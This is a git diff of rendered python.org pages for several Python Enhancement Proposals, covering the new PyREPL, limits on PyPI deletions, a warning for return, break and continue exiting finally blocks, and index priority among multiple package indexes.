These features are significantly enhancing the interactive Python experience, +bringing it more in line with modern development environments and user +expectations. The implementation is in Python, offering several advantages:

+
    +
1. Easier Testing and Validation: Writing tests for Python code is dramatically simpler and more straightforward than for C code, allowing for more comprehensive test coverage of all existing and new features.
  +
  2. Lower Contribution Barrier: Python’s accessibility compared to C has been encouraging more community contributions, leading to faster feature development and bug fixes.
  +
  3. Flexibility: A Python implementation is easier to extend and modify, improving developer velocity on new features and improvements by core developers and contributors alike.
  +
+
+
+

Backwards Compatibility

+

The PyREPL implementation is designed to maintain full backward compatibility +with existing Python code as the old basic REPL will be preserved as a fallback +and is available on demand, in case custom workflows require it. It will also be +used in cases where the new REPL cannot be used due to environmental constraints +or other issues. Users have the option to explicitly choose the old basic REPL +by setting the environment variable PYTHON_BASIC_REPL to 1. This ensures +that users can continue using the familiar interface and capabilities if they +prefer, or if they encounter any issues with the new implementation.

+

It’s important to emphasize that the introduction of PyREPL does not remove any +existing functionality. Any functionality of the old basic REPL unavailable in +PyREPL is preserved and maintained in the old basic REPL that can be used by +users as a fallback.

+

In particular, users wanting to continue using their custom input configuration +in inputrc or editrc files can continue using the old basic REPL.

+

The authors do not expect any PyREPL functionality to be ported to the old basic +REPL. Similarly, inputrc and editrc support is explicitly not planned in +PyREPL. Those configuration files are provided by and parsed by “readline” and +“editline” libraries, and their functional scope does not match the +functionality PyREPL is targeting.

+

To facilitate a smooth transition, clear documentation +is provided on how to switch between PyREPL and the old basic REPL.

+

This approach ensures that while we’re introducing significant improvements with +the new REPL, we’re not forcing any immediate changes on users who rely on the +current implementation. The fallback mechanism and user choice option provide a +safety net that allows for gradual adoption of the new REPL while maintaining +all existing functionality.

+
+
+

Security Implications

+

There are no security implications derived from this proposal.

+
+
+

How to Teach This

+

The introduction of PyREPL is accompanied by documentation and tutorials. Key +areas of focus for education will include:

+
    +
  1. Detailed explanations on using multi-line editing, paste mode, and other new +features.
+
  2. Custom commands (existing and new).
  +
  3. How to switch to the new REPL, including any differences from the previous readline/editline-based configuration.
  +
+
+
+

Rejected Ideas

+

Several alternative approaches were considered and ultimately rejected:

+
    +
1. Extending the current C implementation: While this would maintain maximum backwards compatibility, it was deemed too complex and would not address the fundamental limitations described above.
  +
  2. Developing a new REPL from scratch: This approach was rejected due to the complexity of creating a cross-platform terminal application and the desire to leverage existing, proven code.
  +
  3. Using other existing REPL implementations: The authors looked at several alternatives like IPython, bpython, ptpython, and xonsh. While all the above are impressive projects, in the end PyREPL was chosen for its combination of maturity, feature set, and lack of additional dependencies. Another key factor was the alignment with PyPy’s implementation.
  +
+
+
+

Acknowledgments

+

Thanks to Diego Russo for providing feedback on drafts of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0762.rst

+

Last modified: 2024-10-14 18:54:23 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0763/index.html b/pep-0763/index.html new file mode 100644 index 00000000000..41a1ec3967d --- /dev/null +++ b/pep-0763/index.html @@ -0,0 +1,557 @@ + + + + + + + + PEP 763 – Limiting deletions on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 763 – Limiting deletions on PyPI

+
+
Author:
+
William Woodruff <william at yossarian.net>, +Alexis Challande <alexis.challande at trailofbits.com>
+
Sponsor:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
24-Oct-2024
+
Post-History:
+
09-Jul-2022, +01-Oct-2024, +28-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

We propose limiting when users can delete files, releases, and projects from PyPI. A project, release, or file may only be deleted within 72 hours of when it is uploaded to the index. After that point, users may only use the “yank” mechanism specified by PEP 592.

+

An exception to this restriction is made for releases and files that are +marked with pre-release specifiers, +which will remain deletable at any time. +The PyPI administrators will retain the ability to delete files, releases, +and projects at any time, for example for moderation or security purposes.

+
+
+

Rationale and Motivation

+

As observed in PEP 592, user-level deletion of projects on PyPI +enables a catch-22 situation of dependency breakage:

+
+
Whenever a project detects that a particular release on PyPI might be +broken, they oftentimes will want to prevent further users from +inadvertently using that version. However, the obvious solution of +deleting the existing file from a repository will break users who have +pinned to a specific version of the project.

This leaves projects in a catch-22 situation where new projects may be pulling +down this known broken version, but if they do anything to prevent that they’ll +break projects that are already using it.

+
+

On a technical level, the problem of deletion is mitigated by “yanking,” also specified in PEP 592. However, deletions continue to be allowed on PyPI, and have caused multiple notable disruptions to the Python ecosystem over the intervening years:

+
    +
  • July 2022: atomicwrites +was deleted by its maintainer +in an attempt to remove the project’s “critical” designation, without the +maintainer realizing that project deletion would also delete all previously +uploaded releases.

    The project was subsequently restored with the maintainer’s consent, +but at the cost of manual administrator action and extensive downstream +breakage to projects like pytest. +As of October 2024, atomicwrites is archived but still has +around 4.5 million monthly downloads from PyPI.

    +
  • +
  • April 2023: codecov was deleted by +its maintainers after a long deprecation period. This caused extensive +breakage for many of Codecov’s CI/CD users, who were unaware of the +deprecation period due to limited observability of deprecation warnings +within CI/CD logs.

    The project was +subsequently re-created +by its maintainers, with a new release published to compensate for the deleted releases +(which were not restored), meaning that any pinned installations remained +broken. As of October 2024, this single release remains the only release on +PyPI and has around +1.5 million monthly downloads.

    +
  • +
• June 2023: python-sonarqube-api deleted all releases prior to 2.0.2.

    The project’s maintainer subsequently +deleted conversations +and force-pushed over the tag history for python-sonarqube-api’s source +repository, impeding efforts by users to compare changes between +releases.

    +
  • +
  • June 2024: PySimpleGUI changed +licenses and deleted +nearly all previous releases. +This resulted in widespread disruption for users, who (prior to the +relicensing) were downloading PySimpleGUI approximately 25,000 times a day.
  • +
+

In addition to their disruptive effect on downstreams, deletions +also have detrimental effects on PyPI’s sustainability as well as the overall +security of the ecosystem:

+
    +
  • Deletions increase support workload for PyPI’s administrators and +moderators, as users mistakenly file support requests believing that PyPI +is broken, or that the administrators themselves have removed the +project.
  • +
• Deletions impair external (meaning end-user) incident response and analysis, making it difficult to distinguish “good faith” maintainer behavior from a malicious actor attempting to cover their tracks.
  • +
+

The Python ecosystem is continuing to grow, meaning that future deletions of projects can be reasonably assumed to be just as, if not more, disruptive than the deletions sampled above.

+

Given all of the above, this PEP concludes that deletions now present a greater +risk and detriment to the Python ecosystem than a benefit.

+

In addition to these technical arguments, there is also precedent +from other packaging ecosystems for limiting the ability of users to delete +projects and their constituent releases. This precedent is documented in +Appendix A.

+
+
+

Specification

+

There are three different types of deletable objects:

+
    +
  1. Files, which are individual project distributions (such as source +distributions or wheels).

    Example: requests-2.32.3-py3-none-any.whl.

    +
+
  2. Releases, which contain one or more files that share the same version number.

    Example: requests v2.32.3.

    +
+
  3. Projects, which contain one or more releases.

    Example: requests.

    +
+
+
+

Deletion eligibility rules

+

This PEP proposes the following deletion eligibility rules:

+
    +
  • A file is deletable if and only if it was uploaded to +PyPI less than 72 hours from the current time, or if it +has a pre-release specifier.
  • +
  • A release is deletable if and only if all of its +contained files are deletable.
  • +
  • A project is deletable if and only if all of its releases are deletable.
  • +
+

These rules allow new projects to be +deleted entirely, and allow old projects to delete new files or releases, +but do not allow old projects to delete old files or releases.
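To make these rules concrete, here is a minimal sketch of the eligibility logic in Python. The dataclass and field names are illustrative only, and do not reflect PyPI’s actual data model:

from dataclasses import dataclass
from datetime import datetime, timedelta

DELETION_WINDOW = timedelta(hours=72)

@dataclass
class File:
    filename: str
    uploaded_at: datetime  # when the file was uploaded to the index
    is_prerelease: bool    # version carries a pre-release specifier

def file_deletable(f: File, now: datetime) -> bool:
    # Deletable iff uploaded less than 72 hours ago, or pre-release.
    return (now - f.uploaded_at) < DELETION_WINDOW or f.is_prerelease

def release_deletable(files: list[File], now: datetime) -> bool:
    # A release is deletable iff all of its contained files are deletable.
    return all(file_deletable(f, now) for f in files)

def project_deletable(releases: list[list[File]], now: datetime) -> bool:
    # A project is deletable iff all of its releases are deletable.
    return all(release_deletable(r, now) for r in releases)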

+
+
+
+

Implementation

+

This PEP’s implementation primarily concerns aspects of PyPI that are not +standardized or subject to standardization, such as the web interface and +signed-in user operations. As a result, this section describes its +implementation in behavioral terms.

+
+

Changes

+
    +
  • Per the eligibility rules above, PyPI will reject web interface requests +(using an appropriate HTTP response code of its choosing) for +file, release, or project deletion if the respective object is not +eligible for deletion.
  • +
• PyPI will amend its web interface to indicate a file/release/project’s deletion ineligibility, e.g. by styling the relevant UI elements as “inactive” and making relevant buttons/forms unclickable.
  • +
+
+
+
+

Security Implications

+

This PEP does not identify negative security implications associated with the +proposed approach.

+

This PEP identifies one minor positive security implication: by restricting +user-controlled deletions, this PEP makes it more difficult for a malicious +actor to cover their tracks by deleting malware from the index. This is +particularly useful for external (i.e. non-PyPI administrator) triage and +incident response, where the defending party needs easy access to malware +samples to develop indicators of compromise.

+
+
+

How To Teach This

+

This PEP suggests several pieces of public-facing material to help the larger Python packaging community (and its downstream consumers) understand its changes:

+
    +
  • An announcement post on the PyPI blog explaining +the nature of the PEP, its motivations, and its behavioral implications for +PyPI.
  • +
  • An announcement banner on PyPI itself, linking to the above.
  • +
  • Updates to the PyPI user documentation explaining +the difference between deletion and yanking and the limited conditions under +which the former can still be initiated by package owners.
  • +
+
+
+

Rejected Ideas

+
+

Conditioning deletion on dependency relationships

+

An alternative to time-based deletion windows is deletion eligibility based on +downstream dependents. For example, a release could be considered deletable +if and only if it has fewer than N downstream dependents on PyPI, +where N could be as low as 1.

+

This idea is appealing since it directly links deletion eligibility to +disruptiveness. npm uses it and +conditions project removal on the absence of any downstream dependencies +known to the index.

+

Despite its appeal, this PEP identifies several disadvantages and technical +limitations that make dependency-conditioned deletion not appropriate +for PyPI:

+
    +
  1. PyPI is not aware of dependency relationships. In Python packaging, +both project builds and metadata generation are frequently dynamic +operations, involving arbitrary project-specified code. This is typified +by source distributions containing setup.py scripts, where the execution +of setup.py is responsible for computing the set of dependencies +encoded in the project’s metadata.

    This is in marked contrast to ecosystems like npm and Rust’s +crates, where project builds can be dynamic but +the project’s metadata itself is static.

    +

    As a result of this, PyPI doesn’t know your project’s dependencies, +and is architecturally incapable of knowing them without either running +arbitrary code (a significant security risk) or performing a long-tail +deprecation of setup.py-based builds in favor of PEP 517 and +PEP 621-style static metadata.

    +
+
  2. Results in an unintuitive permissions model. Dependency-conditioned deletion results in a “reversed” power relationship, where anybody who introduces a dependency on a project can prevent that project from being deleted.

This is reasonable at face value, but can be abused to produce unexpected and undesirable (in the context of enabling some deletions) outcomes. A notable example of this is npm’s everything package, which depends on every public package on npm (as of 30 Dec 2023) and thereby prevents their deletion.

    +
+
+
+
+

Conditioning deletion on download count

+

Another alternative to time-based deletion windows is to delete based on the +number of downloads. For example, a release could be considered deletable if +and only if it has fewer than N downloads during the last period.

+

While tying deletion eligibility to a project’s usage has advantages, this PEP identifies several limitations to this approach:

+
    +
1. Ecosystem diversity. The Python ecosystem includes projects with widely varying usage patterns. A fixed download threshold would not adequately account for niche but critical projects with naturally low download counts.
  +
  2. Time sensitivity. Download counts do not necessarily reflect a project’s current status or importance. A previously popular project might have low recent downloads but still be crucial for maintaining older systems.
  +
  3. Technical complexity. Accessing the download count of a project within PyPI is not straightforward, and there is limited possibility to gather a project’s download statistics from mirrors or other distribution systems.
  +
+
+
+
+

Appendix A: Precedent in other ecosystems

+

The following is a table of support for deletion in different packaging ecosystems. An ecosystem is considered to not support deletion if it restricts a user’s ability to perform deletions in a manner similar to this PEP.

+

An earlier version of this table, showing only deletion, was +compiled by Donald Stufft and others on the Python discussion forum in +July 2022.

+
Ecosystem (Index) | Deletion | Yanking | Notes
Python (PyPI) | Yes [1] | Yes [2] | Deletion currently completely unrestricted.
Rust (crates.io) | No [3] | Yes | Deletion by users not allowed at all.
JavaScript (npm) | No [4] | Yes [5] | Deletion is limited by criteria similar to this PEP.
Ruby (RubyGems) | Yes [6] | No | RubyGems calls deletion “yanking.” Yanking in PyPI’s terms is not supported at all.
Java (Maven Central) | No [7] | No | Deletion by users not allowed at all.
PHP (Packagist) | No [8] | No | Deletion restricted after an undocumented number of installs.
.NET (NuGet) | No [9] | Yes [10] | NuGet calls yanking “unlisting.”
Elixir (Hex) | No [11] | Yes [11] | Hex calls yanking “retiring.”
R (CRAN) | No [12] | Yes [12] | Deletion is limited to within 24 hours of initial release or 60 minutes for subsequent versions. CRAN calls yanking “archiving.”
Perl (CPAN) | Yes | No | Yanking is not supported at all. Deletion seemingly encouraged, at least as of 2021 [13].
Lua (LuaRocks) | Yes [14] | Yes [14] | LuaRocks calls yanking “archiving.”
Haskell (Hackage) | No [15] | Yes [16] | Hackage calls yanking “deprecating.”
OCaml (OPAM) | No [17] | Yes [17] | Deletion is allowed if it occurs “reasonably soon” after inclusion. Yanking is de facto supported by the available: false marker, which effectively disables resolution.
+

The following trends are present:

+
    +
  • A strong majority of indices do not support deletion (9 vs. 4)
  • +
  • A strong majority of indices do support yanking (9 vs. 4)
  • +
  • An overwhelming majority of indices support one or the other or neither, +but not both (11 vs. 2)
      +
    • PyPI and LuaRocks are notable outliers in supporting both deletion and +yanking.
    • +
    +
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0763.rst

+

Last modified: 2024-10-28 23:59:04 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0765/index.html b/pep-0765/index.html new file mode 100644 index 00000000000..cfd533ad2b3 --- /dev/null +++ b/pep-0765/index.html @@ -0,0 +1,487 @@ + + + + + + + + PEP 765 – Disallow return/break/continue that exit a finally block | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 765 – Disallow return/break/continue that exit a finally block

+
+
Author:
+
Irit Katriel <irit at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
15-Nov-2024
+
Python-Version:
+
3.14
+
Post-History:
+
09-Nov-2024, +16-Nov-2024
+
Replaces:
+
601
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to withdraw support for return, break and +continue statements that break out of a finally block. +This was proposed in the past by PEP 601. The current PEP +is based on empirical evidence regarding the cost/benefit of +this change, which did not exist at the time that PEP 601 +was rejected. It also proposes a slightly different solution +than that which was proposed by PEP 601.

+
+
+

Motivation

+

The semantics of return, break and continue in a +finally block are surprising for many developers. +The documentation mentions that:

+
    +
  • If the finally clause executes a break, continue +or return statement, exceptions are not re-raised.
  • +
  • If a finally clause includes a return statement, the +returned value will be the one from the finally clause’s +return statement, not the value from the try clause’s +return statement.
  • +
+

Both of these behaviours cause confusion, but the first is particularly dangerous because a swallowed exception is more likely to slip through testing than an incorrect return value.
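For instance, this minimal example demonstrates the first behaviour; the in-flight ValueError is silently discarded by the return in the finally block:

def f():
    try:
        raise ValueError("lost")  # in-flight exception...
    finally:
        return 42                 # ...is swallowed by this return

print(f())  # prints 42; the ValueError never propagates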

+

In 2019, PEP 601 proposed to change Python to emit a +SyntaxWarning for a few releases and then turn it into a +SyntaxError. It was rejected in favour of viewing this +as a programming style issue, to be handled by linters and PEP 8. +Indeed, PEP 8 now recommends not to use control flow statements +in a finally block, and linters such as +Pylint, +Ruff and +flake8-bugbear +flag them as a problem.

+
+
+

Rationale

+

A recent +analysis of real world code shows that:

+
    +
  • These features are rare (2 per million LOC in the top 8,000 PyPI +packages, 4 per million LOC in a random selection of packages). +This could be thanks to the linters that flag this pattern.
  • +
  • Most of the usages are incorrect, and introduce unintended +exception-swallowing bugs.
  • +
  • Code owners are typically receptive to fixing the bugs, and +find that easy to do.
  • +
+

See the appendix for more details.

+

This new data indicates that it would benefit Python’s users if +Python itself moved them away from this harmful feature.

+

One of the arguments brought up in +the PEP 601 discussion +was that language features should be orthogonal, and combine without +context-based restrictions. However, in the meantime PEP 654 has +been implemented, and it forbids return, break and continue +in an except* clause because the semantics of that would violate +the property that except* clauses operate in parallel, so the +code of one clause should not suppress the invocation of another. +In that case we accepted that a combination of features can be +harmful enough that it makes sense to disallow it.

+
+
+

Specification

+

The change is to specify as part of the language spec that +Python’s compiler may emit a SyntaxWarning or SyntaxError +when a return, break or continue would transfer +control flow from within a finally block to a location outside +of it.

+

These examples may emit a SyntaxWarning or SyntaxError:

+
 def f():
+     try:
+         ...
+     finally:
+         return 42
+
+ for x in o:
+     try:
+         ...
+     finally:
+         break  # (or continue)
+
+
+

These examples would not emit the warning or error:

+
 try:
+     ...
+ finally:
+     def f():
+         return 42
+
+ try:
+     ...
+ finally:
+     for x in o:
+         break  # (or continue)
+
+
+

CPython will emit a SyntaxWarning in version 3.14, and we leave +it open whether, and when, this will become a SyntaxError. +However, we specify here that a SyntaxError is permitted by +the language spec, so that other Python implementations can choose +to implement that.

+

The CPython implementation will emit the SyntaxWarning during AST construction, to ensure that the warning will show up during static analysis and compilation, but not during execution of pre-compiled code. We expect that the warning will be seen by a project maintainer (when they run static analysis, or CI which does not have precompiled files). However, end users of a project will only see a warning if they skip precompilation at installation time, check installation time warnings, or run static analysis over their dependencies.

+
+
+

Backwards Compatibility

+

For backwards compatibility reasons, we are proposing that CPython +emit only a SyntaxWarning, with no concrete plan to upgrade that +to an error. Code running with -We may stop working once this +is introduced.

+
+
+

Security Implications

+

The warning/error will help programmers avoid some hard to find bugs, +so will have a security benefit. We are not aware of security issues +related to raising a new SyntaxWarning or SyntaxError.

+
+
+

How to Teach This

+

The change will be documented in the language spec and in the +What’s New documentation. The SyntaxWarning will alert users +that their code needs to change. The empirical evidence +shows that the changes necessary are typically quite +straightforward.

+
+
+

Rejected Ideas

+
+

Emit SyntaxError in CPython

+

PEP 601 proposed that CPython would emit SyntaxWarning for a couple of +releases and SyntaxError afterwards. We are leaving it open whether, and +when, this will become a SyntaxError in CPython, because we believe that a +SyntaxWarning would provide most of the benefit with less risk.

+
+
+

Change Semantics

+

It was suggested +to change the semantics of control flow instructions in finally such that an +in-flight exception takes precedence over them. In other words, a return, +break or continue would be permitted, and would exit the finally +block, but the exception would still be raised.

+

This was rejected for two reasons. First, it would change the semantics of +working code in a way that can be hard to debug: a finally that was written +with the intention of swallowing all exceptions (correctly using the documented +semantics) would now allow the exception to propagate on. This may happen only +in rare edge cases at runtime, and is not guaranteed to be detected in testing. +Even if the code is wrong, and has an exception swallowing bug, it could be +hard for users to understand why a program started raising exceptions in 3.14, +while it did not in 3.13. +In contrast, a SyntaxWarning is likely to be seen during testing, it would +point to the precise location of the problem in the code, and it would not +prevent the program from running.

+

The second objection was about the proposed semantics. The motivation for +allowing control flow statements is not that this would be useful, but rather +the desire for orthogonality of features (which, as we mentioned in the +introduction, is already violated in the case of except* clauses). However, +the proposed semantics are complicated because they suggest that return, +break and continue behave as they normally do when finally executes +without an in-flight exception, but turn into something like a bare raise +when there is one. It is hard to claim that the features are orthogonal if +the presence of one changes the semantics of the other.

+
+
+
+

Appendix

+
+

return in finally considered harmful

+

Below is an abridged version of a +research report +by Irit Katriel, which was posted on 9 Nov 2024. +It describes an investigation into usage of return, break and continue +in a finally clause in real world code, addressing the +questions: Are people using it? How often are they using it incorrectly? +How much churn would the proposed change create?

+
+

Method

+

The analysis is based on the 8,000 most popular PyPI packages, in terms of number +of downloads in the last 30 days. They were downloaded on the 17th-18th of +October, using +a script +written by Guido van Rossum, which in turn relies on Hugo van Kemenade’s +tool that creates a list of the +most popular packages.

+

Once downloaded, a +second script +was used to construct an AST for each file, and traverse it to identify break, +continue and return statements which are directly inside a finally block.
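The following is a simplified sketch of this kind of AST-based detection, written for this summary rather than excerpted from the linked script. It only flags statements whose execution would actually leave the finally block:

import ast

def control_flow_exiting_finally(source: str) -> list[int]:
    """Line numbers of return/break/continue that would exit a finally."""
    hits: list[int] = []

    def scan(stmts: list[ast.stmt], in_loop: bool) -> None:
        for stmt in stmts:
            if isinstance(stmt, ast.Return) or (
                isinstance(stmt, (ast.Break, ast.Continue)) and not in_loop
            ):
                hits.append(stmt.lineno)
            elif isinstance(stmt, ast.If):
                scan(stmt.body, in_loop)
                scan(stmt.orelse, in_loop)
            elif isinstance(stmt, (ast.For, ast.While)):
                # break/continue inside a nested loop stay within it,
                # but a return in the loop body still exits the finally
                scan(stmt.body, True)
                scan(stmt.orelse, in_loop)
            # nested function definitions are deliberately not visited:
            # a return there does not leave the enclosing finally block

    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Try):
            scan(node.finalbody, in_loop=False)
    return hits

src = "def f():\n    try:\n        pass\n    finally:\n        return 1\n"
print(control_flow_exiting_finally(src))  # [5]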

+

I then found the current source code for each occurrence, and categorized it. For +cases where the code seems incorrect, I created an issue in the project’s bug +tracker. The responses to these issues are also part of the data collected in +this investigation.

+
+
+

Results

+

I decided not to include a list of the incorrect usages, out of concern that +it would make this report look like a shaming exercise. Instead I will describe +the results in general terms, but will mention that some of the problems I found +appear in very popular libraries, including a cloud security application. +For those so inclined, it should not be hard to replicate my analysis, as I +provided links to the scripts I used in the Method section.

+

The projects examined contained a total of 120,964,221 lines of Python code, +and among them the script found 203 instances of control flow instructions in a +finally block. Most were return, a handful were break, and none were +continue. Of these:

+
    +
  • 46 are correct, and appear in tests that target this pattern as a feature (e.g., +tests for linters that detect it).
  • +
  • 8 seem like they could be correct - either intentionally swallowing exceptions +or appearing where an active exception cannot occur. Despite being correct, it is +not hard to rewrite them to avoid the bad pattern, and it would make the code +clearer: deliberately swallowing exceptions can be more explicitly done with +except BaseException:, and return which doesn’t swallow exceptions can be +moved after the finally block.
  • +
  • 149 were clearly incorrect, and can lead to unintended swallowing of exceptions. +These are analyzed in the next section.
  • +
+

The Error Cases

+

Many of the error cases followed this pattern:

+
try:
+    ...
+except SomeSpecificError:
+    ...
+except Exception:
+    logger.log(...)
+finally:
+    return some_value
+
+
+

Code like this is obviously incorrect because it deliberately logs and swallows +Exception subclasses, while silently swallowing BaseExceptions. The intention +here is either to allow BaseExceptions to propagate on, or (if the author is +unaware of the BaseException issue), to log and swallow all exceptions. However, +even if the except Exception was changed to except BaseException, this code +would still have the problem that the finally block swallows all exceptions +raised from within the except block, and this is probably not the intention +(if it is, that can be made explicit with another try-except BaseException).
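One possible repair, sketched in the same schematic style as the snippet above (not taken from any of the surveyed projects), keeps the logging but moves the return out of the finally block so that nothing is silently swallowed:

try:
    ...
except SomeSpecificError:
    ...
except Exception:
    logger.log(...)
# no finally: reaching this return in the normal way cannot swallow an
# in-flight BaseException or an exception raised inside a handler
return some_value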

+

Another variation on the issue found in real code looks like this:

+
    try:
+        ...
+    except:
+        return NotImplemented
+    finally:
+        return some_value
+
+
+

Here the intention seems to be to return NotImplemented when an exception is +raised, but the return in the finally block would override the one in the +except block.

+
+

Note

+

Following the +discussion, +I repeated the analysis on a random selection of PyPI packages (to +analyze code written by average programmers). The sample contained +in total 77,398,892 lines of code with 316 instances of return/break/continue +in finally. So about 4 instances per million lines of code.

+
+

Author reactions

+

Of the 149 incorrect instances of return or break in a finally clause, +27 were out of date, in the sense that they do not appear in the main/master branch +of the library, as the code has been deleted or fixed by now. The remaining 122 +are in 73 different packages, and I created an issue in each one to alert the +authors to the problems. Within two weeks, 40 of the 73 issues received a reaction +from the code maintainers:

+
    +
  • 15 issues had a PR opened to fix the problem.
  • +
  • 20 received reactions acknowledging the problem as one worth looking into.
  • +
  • 3 replied that the code is no longer maintained so this won’t be fixed.
  • +
  • 2 closed the issue as “works as intended”, one said that they intend to +swallow all exceptions, but the other seemed unaware of the distinction +between Exception and BaseException.
  • +
+

One issue was linked to a pre-existing open issue about non-responsiveness to Ctrl-C, +conjecturing a connection.

+

Two of the issues were labelled as “good first issue”.

+

The correct usages

+

The 8 cases where the feature appears to be used correctly (in non-test code) also deserve attention. These represent the “churn” that would be caused by blocking the feature, because this is where working code will need to change. I did not contact the authors in these cases, so we need to assess the difficulty of making these changes ourselves. It is shown in the full report that the change required in each case is small.

+
+
+

Discussion

+

The first thing to note is that return/break/continue in a finally block is not something we see often: 203 instances in over 120 million lines of code. This is, possibly, thanks to the linters that warn about this.

+

The second observation is that most of the usages were incorrect: 73% in our +sample (149 of 203).

+

Finally, the author responses were overwhelmingly positive. Of the 40 responses +received within two weeks, 35 acknowledged the issue, 15 of which also created +a PR to fix it. Only two thought that the code is fine as it is, and three +stated that the code is no longer maintained so they will not look into it.

+

The 8 instances where the code seems to work as intended, are not hard to +rewrite.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0765.rst

+

Last modified: 2024-12-12 12:05:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0766/index.html b/pep-0766/index.html new file mode 100644 index 00000000000..058de431d72 --- /dev/null +++ b/pep-0766/index.html @@ -0,0 +1,562 @@ + + + + + + + + PEP 766 – Explicit Priority Choices Among Multiple Indexes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 766 – Explicit Priority Choices Among Multiple Indexes

+
+
Author:
+
Michael Sarahan <msarahan at gmail.com>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
18-Nov-2024
+
Post-History:
+
18-Nov-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Package resolution is a key part of the Python user experience as the means of +extending Python’s core functionality. The experience of package resolution is +mostly taken for granted until someone encounters a situation where the package +installer does something they don’t expect. The installer behavior with +multiple indexes has been a common source of unexpected behavior. Through its ubiquity, pip has +long defined the standard expected behavior across other tools in the ecosystem, +but Python installers are diverging with respect to how they handle multiple +indexes. At the core of this divergence is whether index contents are combined +before resolving distributions, or each index is handled individually in order. +pip merges all indexes before matching distributions, while uv matches +distributions on one index before moving on to the next. Each approach has +advantages and disadvantages. This PEP aims to describe each of these +behaviors, which are referred to as “version priority” and “index priority” +respectively, so that community discussions and troubleshooting can share a +common vocabulary, and so that tools can implement predictable behavior based on +these descriptions.

+
+
+

Motivation

+

Python package users frequently find themselves in need of specifying an index +or package source other than PyPI. There are many reasons for external indexes +to exist:

+ +

In most of these cases, it is not desirable to completely forego PyPI. Instead, +users generally want PyPI to still be a source of packages, but a lower priority +source. Unfortunately, pip’s current design precludes this concept of priority. +Some Python installer tools have developed alternative ways to handle multiple +indexes that incorporate mechanisms to express index priority, such as uv +and PDM.

+

The innovation and the potential for customization are exciting, but they come at the risk of further fragmenting the Python packaging ecosystem, which is already perceived as one of Python’s weak points. The motivation of this PEP is to encourage installers to provide more insight into how they handle multiple indexes, and to provide a vocabulary that can be common to the broader community.

+
+
+

Specification

+
+

“Version priority”

+

This behavior is characterized by the installer always getting the +“best” version of a package, regardless of the index that it comes +from. “Best” is defined by the installer’s algorithm for optimizing +the various traits of a package, also factoring in user input (such as +preferring only binaries, or no binaries). While installers may differ +in their optimization criteria and user options, the general trait that +all version priority installers share is that the index +contents are collated prior to candidate selection.

+

Version priority is most useful when all configured indexes are equally trusted +and well-behaved regarding the distribution interchangeability assumption. +Mirrors are especially well-behaved in this regard. That interchangeability +assumption is what makes comparing distributions of a given package meaningful. +Without it, the installer is no longer comparing “apples to apples.” In +practice, it is common for different indexes to have files that have different +contents than other indexes, such as builds for special hardware, or differing +metadata for the same package. Version priority behavior can lead to +undesirable, unexpected outcomes in these cases, and this is where users +generally look for some kind of index priority. Additionally, when there is a +difference in trust among indexes, version priority does not provide a way to +prefer more trusted indexes over less trusted indexes. This has been exploited by +dependency confusion attacks, and PEP 708 was proposed as a way of +hard-coding a notion of trusted external indexes into the index.

+

The “version priority” name is new, and introduction of new terms should always +be minimized. This PEP looks toward the uv project, which refers to its implementation of the version priority +behavior +as “unsafe-best-match.” Naming is really hard here. On one hand, it +isn’t accurate to call pip’s default behavior intrinsically “unsafe.” +The addition of possibly malicious indexes is what +introduces concern with this behavior. PEP 708 added a way to restrict +installers from drawing packages from unexpected, potentially insecure +indexes. On the other hand, the term “best-match” is technically +correct, but also misleading. The “best match” varies by user and by +application. “Best” is technically correct in the sense that it is a +global optimum according to the match criteria specified above, but that +is not necessarily what is “best” in a user’s eyes. “Version priority” +is a proposed term that avoids the concerns with the uv terminology, +while approximating the behavior in the most user-identifiable way that +packages are compared.

+
+
+

“Index priority”

+

In index priority, the resolver finds candidates for each index, one at a time. +The resolver proceeds to subsequent indexes only if the current package request +has no viable candidates. Index priority does not combine indexes into one +global, flat namespace. Because indexes are searched in order, the package from +an earlier index will be preferred over a package from a later index, +regardless of whether the later index had a better match with the installer’s +optimization criteria. For a given installer, the optimization criteria and +selection algorithm should be the same for both index priority and version +priority. It is only the treatment of multiple indexes that differs: all +together for version priority, and individually for index priority.

+

The order of specification of indexes determines their priority in the +finding process. As a result, the way that installers load the index +configuration must be predictable and reproducible. This PEP does not prescribe +any particular mechanism, other than to say that installers should provide +a way of ordering their collection of sources. Installers should also +ideally provide optional debugging output that provides insight into +which index is being considered.

+

Each package’s finder should start at the beginning of the list of indexes, so each +package starts over with the index list. In other words, if one package has no +valid candidates on the first index, but finds a hit on the second index, +subsequent packages should still start their search on the first index, rather than +starting on the second.
